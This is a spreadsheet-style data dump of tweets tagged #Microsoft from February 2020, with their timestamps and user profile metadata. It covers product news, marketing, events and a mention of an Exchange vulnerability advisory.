'000000', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 16:00:02 +0000 2020</t>
  </si>
  <si>
    <t>Enhanced transportation, intelligent infrastructure, and improved public safetyall powered by #Microsoft #cloud technologies. Discover more in the infographic:
https://t.co/VNH2ogqRVM https://t.co/jnzR5guB7q</t>
  </si>
  <si>
    <t>{'id': 2251125241, 'id_str': '2251125241', 'name': 'Microsoft Smart Cities', 'screen_name': 'MSFTSmartCities', 'location': 'Redmond, WA', 'description': 'Enhance citizen experiences, increase sustainability and resilience, and enhance your city services. #MSFTSmartCities', 'url': 'https://t.co/cqrtcRnAhK', 'entities': {'url': {'urls': [{'url': 'https://t.co/cqrtcRnAhK', 'expanded_url': 'https://www.microsoft.com/en-us/enterprise/government/smart-cities', 'display_url': 'microsoft.com/en-us/enterpriâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 26984, 'friends_count': 12967, 'listed_count': 567, 'created_at': 'Tue Dec 17 23:41:56 +0000 2013', 'favourites_count': 807, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2611, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0078D7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176190449364549632/TZIBLuPu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176190449364549632/TZIBLuPu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2251125241/1541524574', 'profile_link_color': '0078D7',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</si>
  <si>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Feb 26 15:59:34 +0000 2020</t>
  </si>
  <si>
    <t>Many awesome announcement over the past week. Check out the #Microsoft #security and compliance blog for the latest announcements. https://t.co/zyy5T0gX0T #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 249471476, 'id_str': '249471476', 'name': 'Robert Jones', 'screen_name': 'FenixGate', 'location': 'Cleveland, Ohio', 'description': 'A passionate technologist evangelizing, educating, and implementing technologies in the Microsoft ecosystem, including SharePoint, Office 365, Azure.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 116, 'friends_count': 141, 'listed_count': 25, 'created_at': 'Wed Feb 09 03:22:45 +0000 2011', 'favourites_count': 143, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 987,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'http://pbs.twimg.com/profile_images/920263174481371136/mSxjm9iI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920263174481371136/mSxjm9iI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/249471476/1409363738', 'profile_link_color': '001EB3',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</si>
  <si>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15:59:00 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server runs best on Azure. Heres why.
https://t.co/1TePafFrZL
#Microsoft #SQLServer #Azure #cloud #database #cloudmigration #sql #AI #workload #issquared</t>
  </si>
  <si>
    <t>Wed Feb 26 15:58:19 +0000 2020</t>
  </si>
  <si>
    <t>Announcing #Microsoft #PowerBI APIs .NET SDK v3
https://t.co/YIKsNI9HMn https://t.co/EEcTPUqfIU</t>
  </si>
  <si>
    <t>Wed Feb 26 15:58:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft to soon reveal Universal Print, a cloud-based print infrastructure service that eliminates Print Servers https://t.co/kkB8pEA6bG #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 15:57:27 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Surface Duos brand new Peek feature leaked (video) https://t.co/BoEa2td5pG #microsoft #feedly</t>
  </si>
  <si>
    <t>Wed Feb 26 15:57:00 +0000 2020</t>
  </si>
  <si>
    <t>Are you currently using #Office365 and #Azure to boost your customers' digital transformation?
Did you know that by adding onto Dynamics 365, the upsell opportunity could see your current #Microsoft solutions grow by 300% YoY?
Sign up to the webinar: https://t.co/n98ZcdB4qE https://t.co/5plYVSjBuP</t>
  </si>
  <si>
    <t>Wed Feb 26 15:55:05 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Employee Convicted of 18 Felonies in Digital Currency Scheme
A former employee at No\#Microsoft has been found guilty of 18 federal felonies in connection with a complex scheme to embezzle $10 million... https://t.co/O7PfPdsYbw</t>
  </si>
  <si>
    <t>{'id': 2464507645, 'id_str': '2464507645', 'name': 'Bitcoin INFO', 'screen_name': 'BitcoINstagram', 'location': 'United States', 'description': 'ðŸŒ• Bitcoin NEWS â­ï¸\nðŸŒBest Cryptocurrency informationðŸ¥‡\nðŸ“ˆBIGGEST Bitcoin Page on InstagramðŸš€\nðŸ“©On business write to direct', 'url': 'https://t.co/JPkJxQYNIJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/JPkJxQYNIJ', 'expanded_url': 'https://www.instagram.com/bitcoin.info/', 'display_url': 'instagram.com/bitcoin.info/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 356, 'friends_count': 66, 'listed_count': 1, 'created_at': 'Sat Apr 26 11:26:59 +0000 2014', 'favourites_count': 183, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1690,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'http://pbs.twimg.com/profile_images/1035159353018306560/ikX_wV-I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035159353018306560/ikX_wV-I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2464507645/1535636113',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</si>
  <si>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15:53:34 +0000 2020</t>
  </si>
  <si>
    <t>#CIsco via NodeXL https://t.co/U3rms3FJK0
@cisco
@cybersec_feeds
@learningatcisco
@davidbombal
@cybersec2030
@websecurityit
@ciscodevnet
@socialjulio
@sectest9
@cybersecurityn8
Top hashtags:
#cisco
#ccna
#security
#cybersecurity
#ccnp
#microsoft
#devnet
#networking</t>
  </si>
  <si>
    <t>{'id': 98097823, 'id_str': '98097823', 'name': 'Connected Action', 'screen_name': 'ConnectedAction', 'location': 'Belmont, CA', 'description': 'Connected Action applies social science methods to social media strategy &amp; reporting. We provide maps &amp; measures of social media spaces to guide investment.', 'url': 'https://t.co/LhecLereaz', 'entities': {'url': {'urls': [{'url': 'https://t.co/LhecLereaz', 'expanded_url': 'http://www.connectedaction.net', 'display_url': 'connectedaction.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1374, 'friends_count': 1868, 'listed_count': 155, 'created_at': 'Sun Dec 20 10:13:49 +0000 2009', 'favourites_count': 29480, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3088,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'http://pbs.twimg.com/profile_images/1058449535112867841/JP-rVYlW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1058449535112867841/JP-rVYlW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/98097823/1538797822',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</si>
  <si>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15:51:08 +0000 2020</t>
  </si>
  <si>
    <t>Appy days? #Microsoft's Word, Excel and PowerPoint now live under one roof on mobile  but look out for #Office365 popups  The Register "And that's one hell of a #privacy agreement" #iOS &amp;amp; #Android get unified #Office #apps. https://t.co/qqE7bX7bCX</t>
  </si>
  <si>
    <t>Wed Feb 26 15:50:01 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Zero Day Initiative  CVE-2020-0688: Remote Code Execution on #Microsoft #Exchange Server Through Fixed Cryptographic Keys https://t.co/b3xRBJ6UoO &amp;lt; </t>
  </si>
  <si>
    <t>{'id': 159117222, 'id_str': '159117222', 'name': 'Doâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–ˆâ–ˆomâ–ˆâ–ˆâ–ˆâ–ˆ âš—', 'screen_name': 'domineefh', 'location': 'Skaro', 'description': 'ethical #hacker , paranoid #infosec &amp; #security enthusiast, #bash &amp; #python sCR1pT k1Dd13, alert(1); fan, #gamer and #dalek', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 543, 'friends_count': 777, 'listed_count': 159, 'created_at': 'Thu Jun 24 14:03:28 +0000 2010', 'favourites_count': 6541, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8703,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'http://pbs.twimg.com/profile_images/3545371879/a6ab9d397c519af00b2ae4aafacecf12_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3545371879/a6ab9d397c519af00b2ae4aafacecf12_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/159117222/1400765684', 'profile_link_color': '8DD0FC',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</si>
  <si>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Wed Feb 26 15:48:38 +0000 2020</t>
  </si>
  <si>
    <t>Organizations running on-premise Exchange  any supported version (2010, 2013, 2016, 2019) up until the recent patch  would do well to patch as soon as possible https://t.co/RiWf4lqyPv #Microsoft #Exchange</t>
  </si>
  <si>
    <t>{'id': 1243197792, 'id_str': '1243197792', 'name': 'Darryl van der Peijl', 'screen_name': 'DarrylvdPeijl', 'location': 'Amsterdam Area', 'description': 'Freelance Consultant - Microsoft MVP - Technical Evangelist -  Blogger - #Azure, #StorageSpacesDirect - https://t.co/leIE845IGRâ€¦', 'url': 'https://t.co/pFonY5wnks', 'entities': {'url': {'urls': [{'url': 'https://t.co/pFonY5wnks', 'expanded_url': 'http://www.DarrylvanderPeijl.com', 'display_url': 'DarrylvanderPeijl.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/leIE845IGR', 'expanded_url': 'http://nl.linkedin.com/in/darrylvande', 'display_url': 'nl.linkedin.com/in/darrylvande', 'indices': [104, 127]}]}}, 'protected': False, 'followers_count': 2579, 'friends_count': 1259, 'listed_count': 151, 'created_at': 'Tue Mar 05 08:30:46 +0000 2013', 'favourites_count': 3480, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4394,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'http://pbs.twimg.com/profile_images/797851100917403649/CKUnPROT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/797851100917403649/CKUnPROT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1243197792/1446203013', 'profile_link_color': 'FF7F01',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</si>
  <si>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15:48:02 +0000 2020</t>
  </si>
  <si>
    <t>What's the difference between @Azure and @awscloud? Is it time for your business to adopt a cloud platform? Find out in @BrainSell blog "Unraveling the Tech: Microsoft Azure"
#Microsoft #Azure #MicrosoftAzure #AWS #BusinessTech #Cloud #Software #Server
https://t.co/ZfG7IhEQSY</t>
  </si>
  <si>
    <t>{'id': 1022581822184677381, 'id_str': '1022581822184677381', 'name': 'Theresa Conway', 'screen_name': 'BrainSellCOO', 'location': '', 'description': 'COO at BrainSell, avid outdoor enthusiast ðŸš´\u200dâ™€ï¸â›¹ï¸\u200dâ™€ï¸ðŸ§˜\u200dâ™€ï¸ðŸš£\u200dâ™€ï¸ðŸŽ§ðŸ”ï¸ðŸŽðŸ•ðŸš¶\u200dâ™€ï¸', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 101, 'listed_count': 0, 'created_at': 'Thu Jul 26 20:37:59 +0000 2018', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 284,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'http://pbs.twimg.com/profile_images/1022582527813398528/iwvXzm0c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1022582527813398528/iwvXzm0c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1022581822184677381/1532640711',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</si>
  <si>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15:47:52 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Brave Browser Integrates Wayback Machine to View Deleted Web Pages:" https://t.co/ERf4TPJ4jw
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 15:47:42 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X details revealed https://t.co/kdsn0VIZwE via @YouTube #XboxSeriesX #Microsoft #Gears5 #Gaming #GameplayCommentary #gameplay #gamers #gamer #games #game #Xbox</t>
  </si>
  <si>
    <t>Wed Feb 26 15:44:18 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft @microsoft How much officially did one of the employees refuse to help me solve my question just because I am from Russia? I do not want to escalate the problem through the media and news feeds. #microsoft. #microsoftsupport. #news. #windows. #twitter. #BillGates. #Bloomberg</t>
  </si>
  <si>
    <t>{'id': 1017381913, 'id_str': '1017381913', 'name': 'Timur', 'screen_name': 'F1_Timur', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Mon Dec 17 12:33:25 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/583054646983426048/_1qp0BWq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/583054646983426048/_1qp0BWq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1017381913/1427845855', 'profile_link_color': '932131',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</si>
  <si>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15:44:08 +0000 2020</t>
  </si>
  <si>
    <t>A @Wakelet collection of my articles about #Microsoft #whiteboard 
https://t.co/9A7d9rjB9p
#MIEExpert 
#collaboration 
#udl
#accessibility 
#OneNote 
#MicrosoftTeams 
#MicrosoftEDU https://t.co/RxQIhJdKCu</t>
  </si>
  <si>
    <t>Wed Feb 26 15:42:52 +0000 2020</t>
  </si>
  <si>
    <t>Join us in DCI's high tech labs throughout Connecticut! Work on cool projects and earn credentials that employers want! #coding #careergoals #Technology #Cybersecurity #Programming #CompTIA #Cisco #Microsoft #jobs... https://t.co/jVWYVLrvPp</t>
  </si>
  <si>
    <t>Wed Feb 26 15:41:14 +0000 2020</t>
  </si>
  <si>
    <t>WikiLeaks founder Julian Assange cannot be legally extradited for political offences, say lawyers https://t.co/cajgtClGd5 via @Hybrid_Circle #Cisco #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 15:40:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts new Office #app arrives on iOS and #Android with mobile-friendly features https://t.co/dUKyCJFVkR
 via @verge
#software #smartphones</t>
  </si>
  <si>
    <t>Wed Feb 26 15:37:28 +0000 2020</t>
  </si>
  <si>
    <t>@martinwoodward  thank you for the amazing and inspiring presentations #AppInnovationDay #Microsoft https://t.co/gIZoQQvXNV</t>
  </si>
  <si>
    <t>{'id': 2490662693, 'id_str': '2490662693', 'name': 'Kachbouri mohammed a', 'screen_name': 'daly_sama', 'location': '', 'description': '', 'url': 'https://t.co/U4x8fuLI9s', 'entities': {'url': {'urls': [{'url': 'https://t.co/U4x8fuLI9s', 'expanded_url': 'https://dalisama.me', 'display_url': 'dalisama.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 77, 'listed_count': 0, 'created_at': 'Thu Apr 17 21:42:41 +0000 2014', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1036715385255612421/-shlt1OX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1036715385255612421/-shlt1OX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2490662693/1536007230',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</si>
  <si>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15:37:21 +0000 2020</t>
  </si>
  <si>
    <t>I found another tech company to visit
#Microsoft #Denmark https://t.co/8sHdM8F3ES</t>
  </si>
  <si>
    <t>{'id': 260204269, 'id_str': '260204269', 'name': 'Linda Lawton ðŸ‡©ðŸ‡°', 'screen_name': 'LindaLawtonDK', 'location': 'Denmark', 'description': 'Back-end developer.   Identity server 4, .net core, GDE, public speaker, open source contributor.  Proud member of the .Net foundation', 'url': 'https://t.co/KeWMVuCeKB', 'entities': {'url': {'urls': [{'url': 'https://t.co/KeWMVuCeKB', 'expanded_url': 'http://www.daimto.com', 'display_url': 'daimto.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1776, 'friends_count': 664, 'listed_count': 106, 'created_at': 'Thu Mar 03 12:16:54 +0000 2011', 'favourites_count': 10024, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15017,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'http://pbs.twimg.com/profile_images/1184382016646713350/ZbUAgSEr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184382016646713350/ZbUAgSEr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/260204269/1571231483', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 15:30:42 +0000 2020</t>
  </si>
  <si>
    <t>Qualcomm reveals a headset design for its latest VR chips! #VR/#AR #Microsoft @theXRexperience #5G @ar_glasses @EONRealityInc 
https://t.co/SEkTvnJWXF https://t.co/1T3dmG13Bv</t>
  </si>
  <si>
    <t>Wed Feb 26 15:30:12 +0000 2020</t>
  </si>
  <si>
    <t>New video about local group &amp;amp; user migrations (incl. passwords) between Windows 2008 R2 &amp;amp; 2012 R2 member servers. https://t.co/R3w9Anpwa2 #it #Microsoft #Windows #storage #datacenter #sysadmin #ITpro #datacentre #TechSupport #WinServ #ActiveDirectory #WinSrv #WindowsServer</t>
  </si>
  <si>
    <t>Wed Feb 26 15:28:58 +0000 2020</t>
  </si>
  <si>
    <t>Checkout the #microsoftsurface GO Specification and #Review on https://t.co/OBio6Hy4JX.  #shopping #laptop #work #business #microsoft #tech
https://t.co/eNduB3ebA0</t>
  </si>
  <si>
    <t>{'id': 1144461758452551680, 'id_str': '1144461758452551680', 'name': 'Wired Corner', 'screen_name': 'WiredCorner', 'location': 'Punjab, India', 'description': 'We make Tech related videos, based on #Windows, #Linux, #Software and Mobile Apps and post them on #YouTube once a week.', 'url': 'https://t.co/ZoQS2DNPo0', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZoQS2DNPo0', 'expanded_url': 'https://www.wiredcorner.com', 'display_url': 'wiredcorner.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 45, 'friends_count': 874, 'listed_count': 0, 'created_at': 'Fri Jun 28 04:25:21 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 870, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1144462054457085959/jmRFe0dN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1144462054457085959/jmRFe0dN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144461758452551680/1561696993',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</si>
  <si>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15:26:44 +0000 2020</t>
  </si>
  <si>
    <t>A Beautiful Aha Day!
A Beautiful place in Delhi!
26th Feb,Young Innovators Summit, Stein Auditorium, India Habitat Center. 
#KamlaNehruPublicSchool Team AI Answers, National Winners presents their project to @satyanadella CEO #Microsoft @cbseindia29 @ashokkp @Sukhpre76566814 https://t.co/Dczn6bPQFv</t>
  </si>
  <si>
    <t>Wed Feb 26 15:23:51 +0000 2020</t>
  </si>
  <si>
    <t>Leaked video shows new Peek feature on #Microsoft Surface Duo, allowing notifications to be seen &amp;amp; dismissed without fully unfolding the device #foldables https://t.co/zJdyAKJq8z</t>
  </si>
  <si>
    <t>{'id': 1159382001553760256, 'id_str': '1159382001553760256', 'name': 'Simon Thomas', 'screen_name': 'SJTIDC', 'location': 'London, UK', 'description': 'Research Analyst @IDC\nPersonal Computer Devices in Western Europe\nCoverage Area: PC &amp; Tablets Market', 'url': 'https://t.co/3XdbnobYhm', 'entities': {'url': {'urls': [{'url': 'https://t.co/3XdbnobYhm', 'expanded_url': 'http://linkedin.com/in/simon-thomas-45a685132', 'display_url': 'linkedin.com/in/simon-thomaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 25, 'listed_count': 2, 'created_at': 'Thu Aug 08 08:33:04 +0000 2019', 'favourites_count': 25,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'http://pbs.twimg.com/profile_images/1173922052476198912/S-3E8uAk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173922052476198912/S-3E8uAk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1159382001553760256/1568719683',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</si>
  <si>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15:20:23 +0000 2020</t>
  </si>
  <si>
    <t>Leaked video reveals new Surface Duo peek feature https://t.co/3HAWzOfDcM #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 15:20:22 +0000 2020</t>
  </si>
  <si>
    <t>Tempo is a smart home gym that uses computer vision to track your form in real time https://t.co/MxM8d6NQ1s #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 15:19:14 +0000 2020</t>
  </si>
  <si>
    <t>We welcome #Microsoft as Platinum Partner for our Big Data Week Conference in Bucharest!
#BigDataWeek #BDW #BDW2020 #BigData #BigDataBucharest https://t.co/qtr0yuIant</t>
  </si>
  <si>
    <t>{'id': 488417933, 'id_str': '488417933', 'name': 'Big Data Week', 'screen_name': 'bigdataweek', 'location': 'Worldwide', 'description': 'Official #BigDataWeek Account - Connecting global communities to share knowledge &amp; strategies about #BigData #AI #IoT #DataAnalytics #DataPlatforms', 'url': 'http://t.co/bMzxxyD8RT', 'entities': {'url': {'urls': [{'url': 'http://t.co/bMzxxyD8RT', 'expanded_url': 'http://www.bigdataweek.com', 'display_url': 'bigdataweek.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13512, 'friends_count': 2868, 'listed_count': 836, 'created_at': 'Fri Feb 10 12:42:49 +0000 2012', 'favourites_count': 2031, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11451,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'http://pbs.twimg.com/profile_images/1190196777317781504/oIp1cTgA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190196777317781504/oIp1cTgA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/488417933/1572452515', 'profile_link_color': 'DD2E44',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</si>
  <si>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15:17:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is working on the ability to automatically move starred tasks to the top of the list in the To Do app for #Android 
The feature is not available yet, it's an hidden feature. https://t.co/vV16lEdzDv</t>
  </si>
  <si>
    <t>{'id': 89986118, 'id_str': '89986118', 'name': 'Alessandro Paluzzi', 'screen_name': 'alex193a', 'location': 'Roma, Lazio', 'description': 'Mobile Developer ðŸ“±\nAnime and TV Series addicted ðŸ˜Ž âœ¨\nðŸ“ Ferentino (FR) | Rome (RM) ðŸ‘¨ðŸ»\u200dðŸ’»\nðŸŒˆ 26 years old ðŸ‡®ðŸ‡¹ðŸ‡ªðŸ‡º\nðŸ’»Science student\n@WATweaker developer ðŸ‘€', 'url': 'https://t.co/JXG6dq6YVE', 'entities': {'url': {'urls': [{'url': 'https://t.co/JXG6dq6YVE', 'expanded_url': 'https://curiouscat.me/Alex193a', 'display_url': 'curiouscat.me/Alex193a', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1043, 'friends_count': 432, 'listed_count': 1, 'created_at': 'Sat Nov 14 17:59:48 +0000 2009', 'favourites_count': 9961, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6333,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'http://pbs.twimg.com/profile_images/1214424150896451585/UfsV1ODy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214424150896451585/UfsV1ODy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/89986118/1454357266',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</si>
  <si>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15:17:00 +0000 2020</t>
  </si>
  <si>
    <t>Comparing Machine Learning as a Service: Amazon, #Microsoft #Azure, Google Cloud AI from Neeru Jain https://t.co/7Nm36zE0o3 #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 15:16:02 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 15:15:05 +0000 2020</t>
  </si>
  <si>
    <t>It's not what you are given or the tools you use ... #ExpertiseMatters
#Microsoft @Azure - the @MSCloud - can #transform your #IT. 
Think of it as a #gourmet #cloud #deployment #strategy for #business.
Just ask.
https://t.co/0Wbd1lk37T 
@Microsoft #hosting https://t.co/BTRvwjatmU</t>
  </si>
  <si>
    <t>{'id': 17910520, 'id_str': '17910520', 'name': 'IowaComputerGurus', 'screen_name': 'IowaCompGurus', 'location': 'Ankeny, IA', 'description': 'ICG builds successful websites and applications and improves performance with technical skill, communication, organization, and a dedication to service.', 'url': 'http://t.co/hGa4rNnDgG', 'entities': {'url': {'urls': [{'url': 'http://t.co/hGa4rNnDgG', 'expanded_url': 'http://www.iowacomputergurus.com', 'display_url': 'iowacomputergurus.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 320, 'friends_count': 61, 'listed_count': 25, 'created_at': 'Fri Dec 05 22:53:01 +0000 2008', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1428,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'http://pbs.twimg.com/profile_images/1087735506425839616/lXpsvMGf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087735506425839616/lXpsvMGf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17910520/1548171235', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 15:14:59 +0000 2020</t>
  </si>
  <si>
    <t>Loving teams, loving you. Aha! Terrible puns aside, you'll love this week's #WednesdayWisdom if you're thinking about Microsoft #Teams for your business:
https://t.co/1L9t7p6oqu
#Collaboration #Webinar #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 15:14:17 +0000 2020</t>
  </si>
  <si>
    <t>What happens to #BootCamp if #Apple boots #Intel? https://t.co/eM41IHRnwF via @ZDNet &amp;amp; @rossrubin #Pentium #Macintosh #Windows #Microsoft #emulation</t>
  </si>
  <si>
    <t>Wed Feb 26 15:12:24 +0000 2020</t>
  </si>
  <si>
    <t>How to #backup your #Microsoft #Teams #documents to a local file server or #Azure for better #compliance and easy #archive using a simple #Windows Service: https://t.co/3K3OoGoglL #MicrosoftTeams https://t.co/DgAJW0EKyM</t>
  </si>
  <si>
    <t>{'id': 43074332, 'id_str': '43074332', 'name': 'Frank Daske', 'screen_name': 'SharePointFrank', 'location': 'Hamburg / GERMANY', 'description': "It's all about Apps for Office 365, SharePoint, Teams, Azure for data integration &amp; file sync. I'm working for Layer2, but these are my personal opinions.", 'url': 'http://t.co/OdzfHrXTp1', 'entities': {'url': {'urls': [{'url': 'http://t.co/OdzfHrXTp1', 'expanded_url': 'http://www.layer2solutions.com', 'display_url': 'layer2solutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 708, 'friends_count': 658, 'listed_count': 112, 'created_at': 'Thu May 28 08:39:25 +0000 2009', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1568, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2662057802/acea4bf7e66c159aec693b45153719b1_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2662057802/acea4bf7e66c159aec693b45153719b1_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43074332/1431419501', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '663B12', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 15:11:15 +0000 2020</t>
  </si>
  <si>
    <t>Gamepass has fucking done it agian!!! Absolutely incredible new game available on gamepass right now!!!
.
.
.
#xbox #xboxgamepass #videogamelove #twopointhospital #gamepass #gamepassultimate #Microsoft #gamer... https://t.co/6UuKceSz4R</t>
  </si>
  <si>
    <t>Wed Feb 26 15:09:06 +0000 2020</t>
  </si>
  <si>
